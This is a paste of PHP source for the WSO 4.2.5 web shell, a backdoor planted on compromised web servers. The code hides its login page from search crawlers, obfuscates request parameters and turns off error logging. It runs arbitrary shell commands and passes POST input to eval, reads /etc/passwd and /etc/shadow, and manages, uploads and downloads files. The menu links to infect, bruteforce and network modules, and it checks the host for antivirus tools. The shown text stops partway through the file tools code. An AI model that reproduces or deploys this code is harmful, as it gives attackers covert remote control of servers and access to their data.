· 6 years ago · Sep 19, 2019, 09:38 PM
1<?php
2$▛ = "6403da45ca85f5380c73110825b5912e"; //Fuck_You
3$▘ = true;
4$▜ = 'UTF-8';
5$▚ = 'FilesMan';
6$▙ = md5($_SERVER['HTTP_USER_AGENT']);
7if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
8 prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
9}
10if(empty($_POST['charset']))
11 $_POST['charset'] = $▜;
12if (!isset($_POST['ne'])) {
13 if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
14 if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
15 if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
16 if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
17 if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
18}
19function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
20@ini_set('error_log',NULL);
21@ini_set('log_errors',0);
22@ini_set('max_execution_time',0);
23@set_time_limit(0);
24if (PHP_VERSION_ID < 70000)
25 @set_magic_quotes_runtime(0);
26@define('VERSION', '4.2.5');
27if(get_magic_quotes_gpc()) {
28 function stripslashes_array($array) {
29 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
30 }
31 $_POST = stripslashes_array($_POST);
32 $_COOKIE = stripslashes_array($_COOKIE);
33}
34/* (С) 11.2011 oRb */
35if(!empty($▛)) {
36 if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛))
37 prototype(md5($_SERVER['HTTP_HOST']), $▛);
38 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛))
39 hardLogin();
40}
41if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
42 $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘;
43function hardLogin() {
44 if(!empty($_SERVER['HTTP_USER_AGENT'])) {
45 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
46 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
47 header('HTTP/1.0 404 Not Found');
48 exit;
49 }
50 }
51 die("<center><form method=post>Password<br><input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='submit' style='border:none;background-color:#56AD15;color:#fff;cursor:pointer;'></form></center>");
52}
53if(strtolower(substr(PHP_OS,0,3)) == "win")
54 $os = 'win';
55else
56 $os = 'nix';
57$safe_mode = @ini_get('safe_mode');
58if(!$safe_mode)
59 error_reporting(0);
60$disable_functions = @ini_get('disable_functions');
61$home_cwd = @getcwd();
62if(isset($_POST['c']))
63 @chdir($_POST['c']);
64$cwd = @getcwd();
65if($os == 'win') {
66 $home_cwd = str_replace("\\", "/", $home_cwd);
67 $cwd = str_replace("\\", "/", $cwd);
68}
69if($cwd[strlen($cwd)-1] != '/')
70 $cwd .= '/';
71/* (С) 04.2015 Pirat */
72function hardHeader() {
73 if(empty($_POST['charset']))
74 $_POST['charset'] = $GLOBALS['▜'];
75 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title>
76<style>
77 body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
78 #particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
79 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
80 table.info {color:#C3C3C3;}
81 table#toolsTbl {background-color: #060A10;}
82 span,h1,a {color:#fff !important;}
83 span {font-weight:bolder;}
84 h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
85 div.content {padding:5px;margin-left:5px;background-color:#060a10;}
86 a {text-decoration:none;}
87 a:hover {text-decoration:underline;}
88 .tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
89 .tooltip:hover::after {opacity:1;visibility:visible;}
90 .ml1 {border:1px solid #202832;padding:5px;margin:0;overflow:auto;}
91 .bigarea {min-width:100%;max-width:100%;height:400px;}
92 input, textarea, select {margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}
93 label {position:relative}
94 label:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}
95 label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
96 form {margin:0px;}
97 #toolsTbl {text-align:center;}
98 #fak {background:none;}
99 #fak td {padding:5px 0 0 0;}
100 iframe {border:1px solid #060a10;}
101 .toolsInp {width:300px}
102 .main th {text-align:left;background-color:#060a10;}
103 .main tr:hover{background-color:#354252;}
104 .main td, th{vertical-align:middle;}
105 input[type='submit']{background-color:#2E6E9C;}
106 input[type='button']{background-color:#2E6E9C;}
107 input[type='submit']:hover{background-color:#56AD15;}
108 input[type='button']:hover{background-color:#56AD15;}
109 .l1 {background-color:#202832;}
110 pre {font:9pt Courier New;}
111</style>
112<script>
113 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
114 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
115 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
116 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
117 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
118 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
119 var d = document;
120
121 function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
122 function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
123 function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
124 function set(a,c,p1,p2,p3,charset) {
125 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
126 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
127 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
128 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
129 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
130 d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
131 d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
132 d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
133 d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
134 d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
135 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
136 }
137 function g(a,c,p1,p2,p3,charset) {
138 set(a,c,p1,p2,p3,charset);
139 d.mf.submit();
140 }
141 function a(a,c,p1,p2,p3,charset) {
142 set(a,c,p1,p2,p3,charset);
143 var params = 'ajax=true';
144 for(i=0;i<d.mf.elements.length;i++)
145 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
146 sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
147 }
148 function sr(url, params) {
149 if (window.XMLHttpRequest)
150 req = new XMLHttpRequest();
151 else if (window.ActiveXObject)
152 req = new ActiveXObject('Microsoft.XMLHTTP');
153 if (req) {
154 req.onreadystatechange = processReqChange;
155 req.open('POST', url, true);
156 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
157 req.send(params);
158 }
159 }
160 function processReqChange() {
161 if( (req.readyState == 4) )
162 if(req.status == 200) {
163 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
164 var arr=reg.exec(req.responseText);
165 eval(arr[2].substr(0, arr[1]));
166 } else alert('Request error!');
167 }
168</script>
169<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
170<form method=post name=mf style='display:none;'>
171<input type=hidden name=a>
172<input type=hidden name=c>
173<input type=hidden name=p1>
174<input type=hidden name=p2>
175<input type=hidden name=p3>
176<input type=hidden name=charset>
177</form>";
178 $freeSpace = @diskfreespace($GLOBALS['cwd']);
179 $totalSpace = @disk_total_space($GLOBALS['cwd']);
180 $totalSpace = $totalSpace?$totalSpace:1;
181 $release = @php_uname('r');
182 $kernel = @php_uname('s');
183 $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
184 if(strpos('Linux', $kernel) !== false)
185 $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
186 else
187 $explink .= urlencode($kernel . ' ' . substr($release,0,3));
188 if(!function_exists('posix_getegid')) {
189 $user = @get_current_user();
190 $uid = @getmyuid();
191 $gid = @getmygid();
192 $group = "?";
193 } else {
194 $uid = @posix_getpwuid(@posix_geteuid());
195 $gid = @posix_getgrgid(@posix_getegid());
196 $user = $uid['name'];
197 $uid = $uid['uid'];
198 $group = $gid['name'];
199 $gid = $gid['gid'];
200 }
201 $cwd_links = '';
202 $path = explode("/", $GLOBALS['cwd']);
203 $n=count($path);
204 for($i=0; $i<$n-1; $i++) {
205 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
206 for($j=0; $j<=$i; $j++)
207 $cwd_links .= $path[$j].'/';
208 $cwd_links .= "\")'>".$path[$i]."/</a>";
209 }
210 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
211 $opt_charsets = '';
212 foreach($charsets as $▟)
213 $opt_charsets .= '<option value="'.$▟.'" '.($_POST['charset']==$▟?'selected':'').'>'.$▟.'</option>';
214 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
215 if(!empty($GLOBALS['▛']))
216 $m['Logout'] = 'Logout';
217 $m['Self remove'] = 'SelfRemove';
218 $menu = '';
219 foreach($m as $k => $v)
220 $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
221 $drives = "";
222 if ($GLOBALS['os'] == 'win') {
223 foreach(range('c','z') as $drive)
224 if (is_dir($drive.':\\'))
225 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
226 }
227 /* (С) 08.2015 dmkcv */
228 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
229 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="'.$explink.'" target=_blank>[ Exploit-DB ]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( ' .$group. ' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
230 '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">'.$opt_charsets.'</select></label><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
231 '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div>';
232}
233function hardFooter() {
234 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
235 echo "
236</div>
237<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
238 <tr>
239 <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='submit'></form></td>
240 <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
241 </tr><tr>
242 <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
243 <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
244 </tr><tr>
245 <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>
246 <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
247 <input type=hidden name=a value='FilesMan'>
248 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
249 <input type=hidden name=p1 value='uploadFile'>
250 <input type=hidden name=ne value=''>
251 <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
252 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='submit'></form><br ></td>
253 </tr></table></div>
254 <!-- particles --> <div id='particles-js'></div><script src='http://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js'></script>
255 <script>particlesJS('particles-js', {'particles':{'number':{'value':80,'density':{'enable':true,'value_area':800}},'color':{'value':'#ffffff'},'shape':{'type':'triangle','stroke':{'width':0,'color':'#000000'},'polygon':{'nb_sides':5},'image':{'src':'img/github.svg','width':100,'height':100}},'opacity':{'value':0.5,'random':true,'anim':{'enable':false,'speed':1,'opacity_min':0.1,'sync':false}},'size':{'value':3,'random':true,'anim':{'enable':false,'speed':40,'size_min':0.1,'sync':false}},'line_linked':{'enable':true,'distance':200,'color':'#ffffff','opacity':0.4,'width':1},'move':{'enable':true,'speed':1,'direction':'none','random':true,'straight':false,'out_mode':'out','bounce':false,'attract':{'enable':false,'rotateX':10000,'rotateY':10000}}},'interactivity':{'detect_on':'canvas','events':{'onhover':{'enable':true,'mode':'grab'},'onclick':{'enable':true,'mode':'repulse'},'resize':true},'modes':{'grab':{'distance':200,'line_linked':{'opacity':0.5}},'bubble':{'particles_nb':2}}},'retina_detect':true});</script>
256 </body></html>";
257}
258if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
259if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
260function ex($in) {
261 $▖ = '';
262 if (function_exists('exec')) {
263 @exec($in,$▖);
264 $▖ = @join("\n",$▖);
265 } elseif (function_exists('passthru')) {
266 ob_start();
267 @passthru($in);
268 $▖ = ob_get_clean();
269 } elseif (function_exists('system')) {
270 ob_start();
271 @system($in);
272 $▖ = ob_get_clean();
273 } elseif (function_exists('shell_exec')) {
274 $▖ = shell_exec($in);
275 } elseif (is_resource($f = @popen($in,"r"))) {
276 $▖ = "";
277 while(!@feof($f))
278 $▖ .= fread($f,1024);
279 pclose($f);
280 }else return "↳ Unable to execute command\n";
281 return ($▖==''?"↳ Query did not return anything\n":$▖);
282}
283function viewSize($s) {
284 if($s >= 1073741824)
285 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
286 elseif($s >= 1048576)
287 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
288 elseif($s >= 1024)
289 return sprintf('%1.2f', $s / 1024 ) . ' KB';
290 else
291 return $s . ' B';
292}
293function perms($p) {
294 if (($p & 0xC000) == 0xC000)$i = 's';
295 elseif (($p & 0xA000) == 0xA000)$i = 'l';
296 elseif (($p & 0x8000) == 0x8000)$i = '-';
297 elseif (($p & 0x6000) == 0x6000)$i = 'b';
298 elseif (($p & 0x4000) == 0x4000)$i = 'd';
299 elseif (($p & 0x2000) == 0x2000)$i = 'c';
300 elseif (($p & 0x1000) == 0x1000)$i = 'p';
301 else $i = 'u';
302 $i .= (($p & 0x0100) ? 'r' : '-');
303 $i .= (($p & 0x0080) ? 'w' : '-');
304 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
305 $i .= (($p & 0x0020) ? 'r' : '-');
306 $i .= (($p & 0x0010) ? 'w' : '-');
307 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
308 $i .= (($p & 0x0004) ? 'r' : '-');
309 $i .= (($p & 0x0002) ? 'w' : '-');
310 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
311 return $i;
312}
313function viewPermsColor($f) {
314 if (!@is_readable($f))
315 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
316 elseif (!@is_writable($f))
317 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
318 else
319 return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
320}
321function hardScandir($dir) {
322 if(function_exists("scandir")) {
323 return scandir($dir);
324 } else {
325 $dh = opendir($dir);
326 while (false !== ($filename = readdir($dh)))
327 $files[] = $filename;
328 return $files;
329 }
330}
331function which($p) {
332 $path = ex('which ' . $p);
333 if(!empty($path))
334 return $path;
335 return false;
336}
337function actionRC() {
338 if(!@$_POST['p1']) {
339 $a = array(
340 "uname" => php_uname(),
341 "php_version" => phpversion(),
342 "VERSION" => VERSION,
343 "safemode" => @ini_get('safe_mode')
344 );
345 echo serialize($a);
346 } else {
347 eval($_POST['p1']);
348 }
349}
350function prototype($k, $v) {
351 $_COOKIE[$k] = $v;
352 setcookie($k, $v);
353}
354function actionSecInfo() {
355 hardHeader();
356 echo '<h1>Server security information</h1><div class=content>';
357 function showSecParam($n, $v) {
358 $v = trim($v);
359 if($v) {
360 echo '<span>' . $n . ': </span>';
361 if(strpos($v, "\n") === false)
362 echo $v . '<br>';
363 else
364 echo '<pre class=ml1>' . $v . '</pre>';
365 }
366 }
367 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
368 if(function_exists('apache_get_modules'))
369 showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
370 showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
371 showSecParam('Open base dir', @ini_get('open_basedir'));
372 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
373 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
374 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
375 $temp=array();
376 if(function_exists('mysql_get_client_info'))
377 $temp[] = "MySql (".mysql_get_client_info().")";
378 if(function_exists('mssql_connect'))
379 $temp[] = "MSSQL";
380 if(function_exists('pg_connect'))
381 $temp[] = "PostgreSQL";
382 if(function_exists('oci_connect'))
383 $temp[] = "Oracle";
384 showSecParam('Supported databases', implode(', ', $temp));
385 echo '<br>';
386 if($GLOBALS['os'] == 'nix') {
387 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
388 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
389 showSecParam('OS version', @file_get_contents('/proc/version'));
390 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
391 if(!$GLOBALS['safe_mode']) {
392 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
393 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
394 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
395 echo '<br>';
396 $temp=array();
397 foreach ($userful as $▟)
398 if(which($▟))
399 $temp[] = $▟;
400 showSecParam('Userful', implode(', ',$temp));
401 $temp=array();
402 foreach ($danger as $▟)
403 if(which($▟))
404 $temp[] = $▟;
405 showSecParam('Danger', implode(', ',$temp));
406 $temp=array();
407 foreach ($downloaders as $▟)
408 if(which($▟))
409 $temp[] = $▟;
410 showSecParam('Downloaders', implode(', ',$temp));
411 echo '<br/>';
412 showSecParam('HDD space', ex('df -h'));
413 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
414 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
415 }
416 } else {
417 showSecParam('OS Version',ex('ver'));
418 showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
419 showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
420 }
421 echo '</div>';
422 hardFooter();
423}
424function actionFilesTools() {
425 if( isset($_POST['p1']) )
426 $_POST['p1'] = urldecode($_POST['p1']);
427 if(@$_POST['p2']=='download') {
428 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
429 ob_start("ob_gzhandler", 4096);
430 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
431 if (function_exists("mime_content_type")) {
432 $type = @mime_content_type($_POST['p1']);
433 header("Content-Type: " . $type);
434 } else
435 header("Content-Type: application/octet-stream");
436 $fp = @fopen($_POST['p1'], "r");
437 if($fp) {
438 while(!@feof($fp))
439 echo @fread($fp, 1024);
440 fclose($fp);
441 }
442 }exit;
443 }
444 if( @$_POST['p2'] == 'mkfile' ) {
445 if(!file_exists($_POST['p1'])) {
446 $fp = @fopen($_POST['p1'], 'w');
447 if($fp) {
448 $_POST['p2'] = "edit";
449 fclose($fp);
450 }
451 }
452 }
453 hardHeader();
454 echo '<h1>File tools</h1><div class=content>';
455 if( !file_exists(@$_POST['p1']) ) {
456 echo 'File not exists';
457 hardFooter();
458 return;
459 }
460 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
461 if(!$uid) {
462 $uid['name'] = @fileowner($_POST['p1']);
463 $gid['name'] = @filegroup($_POST['p1']);
464 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
465 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
466 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
467 if( empty($_POST['p2']) )
468 $_POST['p2'] = 'view';
469 if( is_file($_POST['p1']) )
470 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame');
471 else
472 $m = array('Chmod', 'Rename', 'Touch');
473 foreach($m as $v)
474 echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
475 echo '<br><br>';
476 switch($_POST['p2']) {
477 case 'view':
478 echo '<pre class=ml1>';
479 $fp = @fopen($_POST['p1'], 'r');
480 if($fp) {
481 while( !@feof($fp) )
482 echo htmlspecialchars(@fread($fp, 1024));
483 @fclose($fp);
484 }
485 echo '</pre>';
486 break;
487 case 'highlight':
488 if( @is_readable($_POST['p1']) ) {
489 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
490 $oRb = @highlight_file($_POST['p1'],true);
491 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$oRb).'</div>';
492 }
493 break;
494 case 'chmod':
495 if( !empty($_POST['p3']) ) {
496 $perms = 0;
497 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
498 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
499 if(!@chmod($_POST['p1'], $perms))
500 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
501 }
502 clearstatcache();
503 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value="submit"></form>';
504 break;
505 case 'edit':
506 if( !is_writable($_POST['p1'])) {
507 echo 'File isn\'t writeable';
508 break;
509 }
510 if( !empty($_POST['p3']) ) {
511 $time = @filemtime($_POST['p1']);
512 $_POST['p3'] = substr($_POST['p3'],1);
513 $fp = @fopen($_POST['p1'],"w");
514 if($fp) {
515 @fwrite($fp,$_POST['p3']);
516 @fclose($fp);
517 echo 'Saved!<br><script>p3_="";</script>';
518 @touch($_POST['p1'],$time,$time);
519 }
520 }
521 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
522 $fp = @fopen($_POST['p1'], 'r');
523 if($fp) {
524 while( !@feof($fp) )
525 echo htmlspecialchars(@fread($fp, 1024));
526 @fclose($fp);
527 }
528 echo '</textarea><input type=submit value="submit"></form>';
529 break;
530 case 'hexdump':
531 $c = @file_get_contents($_POST['p1']);
532 $n = 0;
533 $h = array('00000000<br>','','');
534 $len = strlen($c);
535 for ($i=0; $i<$len; ++$i) {
536 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
537 switch ( ord($c[$i]) ) {
538 case 0: $h[2] .= ' '; break;
